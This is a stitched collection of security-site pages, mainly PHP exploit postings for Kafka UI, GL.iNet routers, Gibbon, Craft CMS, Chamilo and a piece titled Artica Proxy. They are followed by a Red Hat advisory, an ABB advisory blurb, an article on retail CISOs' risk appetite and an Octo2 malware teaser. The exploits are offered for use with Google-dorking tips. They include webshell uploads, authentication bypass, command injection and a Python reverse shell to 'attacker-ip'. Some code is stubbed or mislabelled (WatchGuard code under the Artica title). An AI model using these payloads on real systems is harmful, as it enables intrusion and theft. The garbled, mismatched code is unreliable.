Kafka UI version 0.7.1 suffers from a remote code injection vulnerability.

    =============================================================================================================================================| # Title     : Kafka UI 0.7.1 Code Injection Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://github.com/provectus/kafka-ui/                                                                                      |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 159 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass KafkaUIExploit {    private $target;    private $version;    private $cluster;    private $new_topic;    public function __construct($target) {        $this->target = $target;    }    public function vuln_version() {        $uri = $this->normalize_uri('/actuator/info');        $response = $this->send_request('GET', $uri, 'application/json');        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            if (!empty($json_response)) {                if (isset($json_response['build']['version'])) {                    $this->version = ltrim($json_response['build']['version'], 'v');                } elseif (isset($json_response['git']['commit']['id'])) {                    // Git commit versioning (this part should check with a local list if needed)                    $git_commit_id = substr($json_response['git']['commit']['id'], 0, 7);                    // Implement logic to map git commit to version                }                return version_compare($this->version, '0.7.1', '<=') && version_compare($this->version, '0.4.0', '>=');            }        }        return false;    }    public function get_cluster() {        $uri = $this->normalize_uri('/api/clusters');        $response = $this->send_request('GET', $uri, 'application/json');        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            foreach ($json_response as $cluster) {                if ($cluster['status'] == 'online' || $cluster['topicCount'] > 0) {                    return $cluster['name'];                }            }        }        return null;    }    public function create_topic($cluster) {        $topic_name = $this->random_string(8);        $post_data = json_encode([            'name' => $topic_name,            'partitions' => 1,            'replicationFactor' => 1,            'configs' => [                'cleanup.policy' => 'delete',                'retention.bytes' => '-1'            ]        ]);        $uri = $this->normalize_uri("/api/clusters/$cluster/topics");        $response = $this->send_request('POST', $uri, 'application/json', $post_data);        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            return $json_response['name'];        }        return null;    }    public function delete_topic($cluster, $topic) {        $uri = $this->normalize_uri("/api/clusters/$cluster/topics/$topic");        $response = $this->send_request('DELETE', $uri, 'application/json');        return $response['status_code'] == 200;    }    public function produce_message($cluster, $topic) {        $post_data = json_encode([            'partition' => 0,            'key' => 'null',            'content' => 'null',            'keySerde' => 'String',            'valueSerde' => 'String'        ]);        $uri = $this->normalize_uri("/api/clusters/$cluster/topics/$topic/messages");        $response = $this->send_request('POST', $uri, 'application/json', $post_data);        return $response['status_code'] == 200;    }    public function execute_command($cmd) {        $payload = "Process p=new ProcessBuilder(\"sh\",\"-c\",\"$cmd\").redirectErrorStream(true).start()";        $uri = $this->normalize_uri("/api/clusters/{$this->cluster}/topics/{$this->new_topic}/messages");        $params = [            'q' => $payload,            'filterQueryType' => 'GROOVY_SCRIPT',            'attempt' => 2,            'limit' => 100,            'page' => 0,            'seekDirection' => 'FORWARD',            'keySerde' => 'String',            'valueSerde' => 'String',            'seekType' => 'BEGINNING'        ];        return $this->send_request('GET', $uri, 'application/x-www-form-urlencoded', '', $params);    }    public function check() {        if ($this->vuln_version()) {            return "Kafka-ui version: {$this->version} is vulnerable";        }        return "Kafka-ui version is not vulnerable or unknown.";    }    public function exploit() {        $this->cluster = $this->get_cluster();        if (!$this->cluster) {            die("Could not find or connect to an active Kafka cluster.");        }        $this->new_topic = $this->create_topic($this->cluster);        if (!$this->new_topic) {            die("Could not create a new topic.");        }        if (!$this->produce_message($this->cluster, $this->new_topic)) {            die("Failed to trigger Groovy script payload execution.");        }        $this->execute_command('your_command_here'); // Replace with your desired command        if ($this->delete_topic($this->cluster, $this->new_topic)) {            echo "Successfully deleted topic {$this->new_topic}.";        } else {            echo "Could not delete topic {$this->new_topic}. Manual cleanup required.";        }    }    private function send_request($method, $uri, $content_type, $data = '', $params = []) {        // Placeholder for HTTP request logic (curl, file_get_contents, etc.)        // Implement this function with your desired HTTP request library in PHP        return [            'status_code' => 200,            'body' => '{}'        ];    }    private function normalize_uri($path) {        return $this->target . $path;    }    private function random_string($length) {        return bin2hex(random_bytes($length / 2));    }}// Example usage:$exploit = new KafkaUIExploit("http://target.com");echo $exploit->check();$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Kafka UI 0.7.1 Code Injection

Red Hat Security Advisory 2024-7972-03 - An update for Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available. The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products. Red Hat Product Security has rated this update as having a security impact of Critical. Issues addressed include a code execution vulnerability.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7972.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available (RHBQ 3.8.6.SP1)  
Advisory ID:        RHSA-2024:7972-03  
Product:            Red Hat Build of Apache Camel  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7972  
Issue date:         2024-10-10  
Revision:           03  
CVE Names:          CVE-2024-7254  
====================================================================

Summary: 

An update for Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available (RHBQ 3.8.6.SP1).  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products.  
Red Hat Product Security has rated this update as having a security impact of Critical.

Description:

An update for Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available (RHBQ 3.8.6.SP1).  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products:  
* CVE-2024-47561 org.apache.avro/avro: Schema parsing may trigger Remote Code Execution (RCE)  
* CVE-2024-7254 com.google.protobuf/protobuf-java: StackOverflow vulnerability in Protocol Buffers

Solution:

CVEs:

CVE-2024-7254

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2313454  
https://bugzilla.redhat.com/show_bug.cgi?id=2316116

Red Hat Security Advisory 2024-7972-03

GL.iNet version 4.4.3 suffers from authentication bypass and code injection vulnerabilities.

    =============================================================================================================================================| # Title     : GL.iNet network 4.4.3 Code Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.gl-inet.com/                                                                                                    |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 158 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GlinetExploit{    private $targetUri;    private $sid;    private $glinet;    public function __construct($targetUri)    {        $this->targetUri = $targetUri;        $this->glinet = [            'model' => null,            'firmware' => null,            'arch' => null        ];    }    private function send_request($method, $uri, $data = null, $headers = [])    {        $ch = curl_init();        $options = [            CURLOPT_URL => $this->targetUri . $uri,            CURLOPT_RETURNTRANSFER => true,            CURLOPT_CUSTOMREQUEST => $method        ];        if ($data) {            $options[CURLOPT_POSTFIELDS] = $data;            $headers[] = 'Content-Type: application/json';        }        curl_setopt_array($ch, $options);        $response = curl_exec($ch);        curl_close($ch);        return $response ? json_decode($response, true) : null;    }    public function check_vuln_version()    {        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'call',            'params' => ['', 'ui', 'check_initialized', []]        ]);        $res = $this->send_request('POST', '/rpc', $postData);        if ($res && isset($res['result'])) {            $this->glinet['model'] = $res['result']['model'];            $this->glinet['firmware'] = $res['result']['firmware_version'];        }        // Check for vulnerable models and firmware        switch ($this->glinet['model']) {            case 'sft1200':                $this->glinet['arch'] = 'mipsle';                return version_compare($this->glinet['firmware'], '4.3.6', '==');            case 'ar750':            case 'ar750s':                $this->glinet['arch'] = 'mipsbe';                return version_compare($this->glinet['firmware'], '4.3.7', '==');            // Add more cases as per your requirement        }        return false;    }    public function auth_bypass()    {        if (!empty($this->sid)) {            return $this->sid;        }        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'challenge',            'params' => ['username' => 'root']        ]);        $res = $this->send_request('POST', '/rpc', $postData);        if ($res && isset($res['result']['nonce'])) {            $nonce = $res['result']['nonce'];            $username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+";            $pw = '0';            $hash = md5("$username:$pw:$nonce");            $postData = json_encode([                'jsonrpc' => '2.0',                'id' => rand(1000, 9999),                'method' => 'login',                'params' => [                    'username' => $username,                    'hash' => $hash                ]            ]);            $res = $this->send_request('POST', '/rpc', $postData);            if ($res && isset($res['result']['sid'])) {                $this->sid = $res['result']['sid'];                return $this->sid;            }        }        return null;    }    public function execute_command($cmd)    {        $payload = base64_encode($cmd);        $cmd = "echo {$payload}|openssl enc -base64 -d -A|sh";        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'call',            'params' => [                $this->sid,                'logread',                'get_system_log',                ['lines' => '', 'module' => "|{$cmd}"]            ]        ]);        return $this->send_request('POST', '/rpc', $postData, ['Admin-Token: ' . $this->sid]);    }    public function check()    {        if ($this->check_vuln_version()) {            return "Vulnerable: {$this->glinet['model']} | {$this->glinet['firmware']} | {$this->glinet['arch']}";        }        return 'Not Vulnerable';    }    public function exploit($command)    {        $this->sid = $this->auth_bypass();        if ($this->sid) {            echo "SID: {$this->sid}\n";            echo "Executing: {$command}\n";            $this->execute_command($command);        } else {            echo "Authentication bypass failed.\n";        }    }}// Usage$exploit = new GlinetExploit('https://target-url');$exploit->exploit('ls');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

GL.iNet 4.4.3 Code Injection

Gibbon School Platform version 26.0.00 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Gibbon School Platform 26.0.00 Code Injection Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://gibbonedu.org/                                                                                                      |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 108 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GibbonExploit{    private $target_uri;    private $username;    private $password;    private $webshell_name;    public function __construct($target_uri, $username, $password, $webshell_name = null)    {        $this->target_uri = $target_uri;        $this->username = $username;        $this->password = $password;        $this->webshell_name = $webshell_name ?: $this->randomString() . '.php';    }    private function send_request($method, $url, $data = null, $headers = [])    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);        if (!empty($headers)) {            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function gibbon_login()    {        $login_url = $this->target_uri . '/login.php?timeout=true';        $data = [            'address' => '',            'method' => 'default',            'username' => $this->username,            'password' => $this->password,            'gibbonSchoolYearID' => '025',            'gibboni18nID' => '0002'        ];        return $this->send_request('POST', $login_url, http_build_query($data));    }    private function construct_form_data($payload)    {        $payload_len = strlen($payload);        $payload_data = 'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";r:3;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:' . $payload_len . ':"' . $payload . '";s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}';        $form_data = [            'address' => '/modules/System Admin/import_run.php',            'mode' => 'sync',            'syncField' => 'N',            'syncColumn' => '',            'columnOrder' => $payload_data,            'columnText' => 'N;',            'fieldDelimiter' => '%2C',            'stringEnclosure' => '%22',            'filename' => $this->randomString() . '.xlsx',            'csvData' => '"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"',            'ignoreErrors' => '1',            'Failed' => 'Submit'        ];        return $form_data;    }    public function upload_webshell($b64_payload)    {        $php_payload = "echo \"<?php @eval(base64_decode('$b64_payload'));?>\" > " . $this->webshell_name;        $form_data = $this->construct_form_data($php_payload);        $url = $this->target_uri . '/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4';        return $this->send_request('POST', $url, http_build_query($form_data));    }    public function execute_php($cmd)    {        $b64_payload = base64_encode($cmd);        $res = $this->upload_webshell($b64_payload);        if (!$res) {            die('Web shell upload error.');        }        // execute the webshell        $url = $this->target_uri . '/' . $this->webshell_name;        return $this->send_request('GET', $url);    }    private function randomString($length = 10)    {        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);    }}// Usage$exploit = new GibbonExploit('https://target-site.com', 'username@example.com', 'password');$exploit->gibbon_login();$response = $exploit->execute_php('phpinfo();');echo $response;Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Gibbon School Platform 26.0.00 Code Injection

Craft CMS version 4.4.14 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Craft CMS 4.4.14 Code Injection Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://craftcms.com/                                                                                                       |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 116 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass CraftCMSExploit {    private $target_uri;    private $webshell;    private $config = ['upload_tmp_dir' => null, 'document_root' => null];    private $post_param;    private $get_param;    public function __construct($target_uri, $webshell = '') {        $this->target_uri = $target_uri;        $this->webshell = $webshell ? $webshell : $this->generateRandomString(8, 16) . '.php';        $this->post_param = $this->generateRandomString(1, 8);        $this->get_param = $this->generateRandomString(1, 8);    }    public function check_phpinfo() {        // Sends a crafted request to extract upload_tmp_dir and document_root from phpinfo()        $data = http_build_query([            'action' => 'conditions/render',            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',            'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'        ]);        $response = $this->sendPostRequest($this->target_uri, $data);        if ($response) {            $this->parsePHPInfo($response);        }    }    private function parsePHPInfo($response) {        // Parses the phpinfo() HTML response to find upload_tmp_dir and document_root        if (preg_match('/upload_tmp_dir.+<td class="v">(.*)<\/td>/i', $response, $matches)) {            $this->config['upload_tmp_dir'] = $matches[1] == 'no value' ? '/tmp' : trim($matches[1]);        }        if (preg_match('/DOCUMENT_ROOT.+<td class="v">(.*)<\/td>/i', $response, $matches)) {            $this->config['document_root'] = trim($matches[1]);        }    }    public function upload_webshell() {        // Generates an XML payload to upload the webshell via Imagick MSL        $payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>        <image>            <read filename=\"caption:<?php @eval(base64_decode(\$_POST['{$this->post_param}'])); ?>\" />            <write filename=\"info:{$this->config['document_root']}/{$this->webshell}\" />        </image>";        $form_data = [            'action' => 'conditions/render',            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',            'config' => '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}',            'payload' => $payload        ];        $response = $this->sendMultipartPostRequest($this->target_uri, $form_data);        return strpos($response, '502') !== false;    }    public function execute_command($cmd) {        // Executes a command on the server via the uploaded webshell        $payload = base64_encode($cmd);        $data = http_build_query([$this->post_param => $payload]);        return $this->sendPostRequest($this->target_uri . '/' . $this->webshell, $data);    }    private function sendPostRequest($uri, $data) {        $options = [            'http' => [                'header' => "Content-type: application/x-www-form-urlencoded\r\n",                'method' => 'POST',                'content' => $data,            ],        ];        $context = stream_context_create($options);        return file_get_contents($uri, false, $context);    }    private function sendMultipartPostRequest($uri, $data) {        // Sends a multipart form-data POST request        $boundary = uniqid();        $delimiter = '------' . $boundary;        $post_data = $this->buildMultipartData($data, $delimiter);        $options = [            'http' => [                'header' => "Content-Type: multipart/form-data; boundary=" . $boundary . "\r\n",                'method' => 'POST',                'content' => $post_data,            ],        ];        $context = stream_context_create($options);        return file_get_contents($uri, false, $context);    }    private function buildMultipartData($data, $delimiter) {        $post_data = '';        foreach ($data as $name => $content) {            $post_data .= "--$delimiter\r\n";            $post_data .= "Content-Disposition: form-data; name=\"$name\"\r\n\r\n";            $post_data .= "$content\r\n";        }        $post_data .= "--$delimiter--\r\n";        return $post_data;    }    private function generateRandomString($min, $max) {        $length = rand($min, $max);        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);    }}// Usage$exploit = new CraftCMSExploit('http://target-craftcms.com');$exploit->check_phpinfo();if ($exploit->upload_webshell()) {    echo $exploit->execute_command('whoami');}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Craft CMS 4.4.14 Code Injection

Chamilo version 1.11.18 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Chamilo 1.11.18 Code Injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://chamilo.org/en/2023/02/03/10-new-features-in-chamilo-1-11-18/                                                       |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 123 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass ChamiloExploit {    private $targetUri;    private $webshellName;    private $postParam;    public function __construct($targetUri, $webshell = null) {        $this->targetUri = rtrim($targetUri, '/');        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();    }    private function generateRandomWebshellName() {        return bin2hex(random_bytes(8)) . '.php';    }    private function soapRequest($cmd) {        $pptSize = rand(720, 1440) . 'x' . rand(360, 720);        return <<<EOS<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"    xmlns:ns1="{$this->targetUri}"    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"    xmlns:xsd="http://www.w3.org/2001/XMLSchema"    xmlns:ns2="http://xml.apache.org/xml-soap"    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">    <SOAP-ENV:Body>        <ns1:wsConvertPpt>            <param0 xsi:type="ns2:Map">                <item>                    <key xsi:type="xsd:string">file_data</key>                    <value xsi:type="xsd:string"></value>                </item>                <item>                    <key xsi:type="xsd:string">file_name</key>                    <value xsi:type="xsd:string">`{{}}`.pptx'|" |{$cmd}||a #</value>                </item>                <item>                    <key xsi:type="xsd:string">service_ppt2lp_size</key>                    <value xsi:type="xsd:string">{$pptSize}</value>                </item>            </param0>        </ns1:wsConvertPpt>    </SOAP-ENV:Body></SOAP-ENV:Envelope>EOS;    }    public function uploadWebshell() {        $this->postParam = bin2hex(random_bytes(4));        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $pngWebshell = $this->injectPhpPayloadPng($phpPayload);        if ($pngWebshell === null) {            return null;        }        $payload = base64_encode($pngWebshell);        $cmd = "echo {$payload}|openssl enc -a -d > ./{$this->webshellName}";        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));        return $response;    }    private function injectPhpPayloadPng($phpPayload) {        // Implement your logic to inject PHP payload into a PNG image        // For demonstration purposes, we'll return a dummy PNG data        return pack('H*', '89504E470D0A1A0A...'); // Example PNG header    }    public function executePhp($cmd) {        $payload = base64_encode($cmd);        $response = $this->sendRequest('POST', "/main/inc/lib/ppt2png/{$this->webshellName}", "application/x-www-form-urlencoded", [$this->postParam => $payload]);        return $response;    }    public function executeCommand($cmd) {        $payload = base64_encode($cmd);        $cmd = "echo {$payload}|openssl enc -a -d|sh";        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));        return $response;    }    public function check() {        $marker = bin2hex(random_bytes(4));        $res = $this->executeCommand("echo {$marker}");        if ($res && strpos($res, 'wsConvertPptResponse') !== false && strpos($res, $marker) !== false) {            return 'Vulnerable';        } else {            return 'Safe';        }    }    public function exploit($payload) {        switch ($payload['type']) {            case 'php':                $res = $this->uploadWebshell();                if (!$res || strpos($res, 'wsConvertPptResponse') === false) {                    throw new Exception('Web shell upload error.');                }                $this->executePhp($payload['encoded']);                break;            case 'unix_cmd':                $this->executeCommand($payload['encoded']);                break;            case 'linux_dropper':                // Implement Linux dropper logic                break;        }    }    private function sendRequest($method, $uri, $ctype, $data) {        // Implement your HTTP request logic here (using cURL or similar)        // For demonstration purposes, return a dummy response        return 'Dummy response';    }}// Usage$exploit = new ChamiloExploit('http://target.com', 'webshell.php');$exploit->check();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Chamilo 1.11.18 Code Injection

Artica Proxy version 4.40 suffers from a code injection vulnerability that provides a reverse shell.

    =============================================================================================================================================| # Title     : Artica Proxy appliance 4.40 Code Injection Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://artica-proxy.com/                                                                                                   |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 97 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass WatchGuardExploit {    private $targetUri;    private $lhost;    private $lport;    private $shell;    public function __construct($targetUri, $lhost, $lport, $shell = "/usr/bin/python") {        $this->targetUri = $targetUri;        $this->lhost = $lhost;        $this->lport = $lport;        $this->shell = $shell;    }    public function sendRequest($method, $url, $data = null, $headers = []) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        if (!empty($headers)) {            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function checkWatchGuardFirebox() {        $url = $this->targetUri . '/auth/login';        $response = $this->sendRequest('GET', $url, null, ['from_page' => '/']);                if ($response && strpos($response, 'Powered by WatchGuard Technologies') !== false             && strpos($response, 'Firebox') !== false) {            return true;        }        return false;    }    public function createBofPayload() {        // Generate the buffer overflow payload with Python reverse shell code        $randomStr = bin2hex(random_bytes(2)); // 4-character random alphanumeric        $pyFilename = "/tmp/" . $randomStr . ".py";        $payload = "<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><" . str_repeat('A', 3181) . "MFA>";        $payload .= str_repeat('<BBBBMFA>', 3680);        // Include a Python reverse shell command as the payload        $payload .= 'import socket;from subprocess import call; from os import dup2;';        $payload .= 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);';        $payload .= 's.connect(("' . $this->lhost . '",' . $this->lport . '));';        $payload .= 'dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);';        $payload .= 'call(["' . $this->shell . '","-i"]);';        $payload .= 'import os; os.remove("' . $pyFilename . '");';        return gzencode($payload); // gzip encoding    }    public function exploit() {        if (!$this->checkWatchGuardFirebox()) {            echo "Target is not vulnerable.\n";            return;        }        echo "Target is vulnerable. Sending exploit...\n";        $bofPayload = $this->createBofPayload();        // Send the buffer overflow payload        $url = $this->targetUri . '/agent/login';        $this->sendRequest('POST', $url, $bofPayload, [            'Accept-Encoding: gzip, deflate',            'Content-Encoding: gzip'        ]);        echo "Payload sent.\n";    }}// Example usage:$exploit = new WatchGuardExploit('https://target-ip:8080', 'attacker-ip', 4444);$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Artica Proxy 4.40 Code Injection

The ABB BMS/BAS controller suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'MODEM' HTTP POST parameter called by the dialupSwitch.php script.

ABB Cylon Aspect 3.08.00 (dialupSwitch.php) Remote Code Execution

CISOs in consumer and retail organizations appear to accept greater risks to allow for more innovation, which could be a model for future growth.

Source: FOTOGRIN via Shutterstock

Chief information security officers (CISOs) have long borne the reputation of blocking innovation to keep their organization and all its data safe and sound.

However, those competing priorities appear to be shifting, especially in the retail and consumer sectors. While the majority of CISOs (59%) across all sectors see themselves as "enablers" — as opposed to just managers of cyber-risk — nearly all (97%) CISOs in the retail segment view their role as an enabler, according to a survey of more than 1,000 global CISOs conducted by cybersecurity firm Netskope. As a result, CISOs' acceptance of risk has grown, with the majority of all CISOs ready to take on more risk compared with five years ago. For the retail sector, the share of risk-embracing CISOs is even higher (74%).

The pressure on companies to innovate — and CISOs' understanding of their role in making that happen — are driving CISOs to become risk-takers, Netskope CISO James Robinson says.

"Typically, you had someone who was really, really technical, and they were working through things, but they really didn't have that business side of the brain — knowing the business metrics and data," he says. "CISOs have moved from the need to say no and maybe even taken it a step further — saying the answer is always, "Yes, just how do we get there?'"

From gift-card scams to brand hijacking for phishing attacks to devastating ransomware, retailers are a popular target for cybercriminals and fraudsters. At the same time, the retail sector has had to weather the chaos caused by the pandemic and supply-chain disruptions, which led to demand fluctuations and a loss of brand loyalty. The subsequent spike in inflation over the past two years left many consumers prioritizing price. Most retail executives (67%) expect consumers to purchase fewer products in 2024, and so retailers are increasingly focused on winning loyalty, according to consultancy Deloitte's "2024 US Retail Industry Outlook" report.

**Security in the Era of Amazon and AI**

With all those disruptive forces in the market, retailers have had to transform themselves to compete, morphing from just focused on selling products to becoming data companies. Consequently, CISOs at retail companies can no longer afford to focus solely on putting a wall around their information, says Netskope's Robinson.

Like other members of the C-suite, CISOs have to be thinking about the business more holistically, Robinson says.

"Retailers now have to ask, 'What's the next innovation? What's the next thing we have to do?'" he says. "And all of those decisions are data driven ... they're being led by this wealth of data that they're collecting, so that they can have targeted experiences for their customers."

Artificial intelligence is one obvious way to innovate. A great deal of the pressure to change over the past two years has come from the development of AI capabilities and businesses' fear of missing out on any innovations — and competitive advantages. In-store cameras paired with AI analysis can determine consumer interest in products, ecommerce platforms can better predict inventory, and stores can even use recognition of facial expressions to gauge consumer sentiment.

While most companies have slowly tested the waters of AI, many will be putting their first AI-powered applications into product in the next 12 months, Robinson says.

"This is the first year also that we're really seeing GenAI projects kick off, and in the next year, we'll start to really see kind of the value of some of these projects," he says. "So I think that's probably what's shaping it even more."

**The Business-Focused CISO**

Yet, AI and cybersecurity are two technology areas that are least likely to have positive returns on investments for retailers, according to consultancy KPMG's 2023 "US Consumer and Retail Sector Insights Report." Only 46% of survey respondents noted an increase in profitability or performance due to AI — and 45% from cybersecurity. But the consumer and retail sector fell even short of that threshold, with 38% and 37% of respondents, respectively, in those industries seeing a return on investment from AI or cybersecurity.

"For many consumer and retail organizations, getting data right is still a work in progress," KPMG stated in the report.

Understandably, there are still some risks where CISOs are unwilling to compromise. Sharing information with outside parties or third parties without the proper review and without the proper agreement in place — a threat becoming more common in the era of AI — is just not possible, says Robinson.

"We knew how to data warehouse, and it's got business value — even more now with the development of GenAI," he says. "I think all of those things have kind of started to come together at this point, allowing the retail CISO to really have a leg to stand on. Now they just also have kind of the business knowledge, because they're being brought into more of these conversations at this point."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Retail CISOs Take on More Risk to Foster Innovation

Octo2 malware is targeting Android devices by disguising itself as popular apps like NordVPN and Google Chrome. This…

Octo2 malware is targeting Android devices by disguising itself as popular apps like NordVPN and Google Chrome. This advanced trojan uses sophisticated techniques to evade detection, steal credentials, and enable remote access to infected devices.

Cybersecurity researchers at DomainTools have released their new research on Octo2, a new version of the notorious Octo malware family. Octo2 targets Android mobile devices and based on its activity, researchers believe that it will target users globally soon.

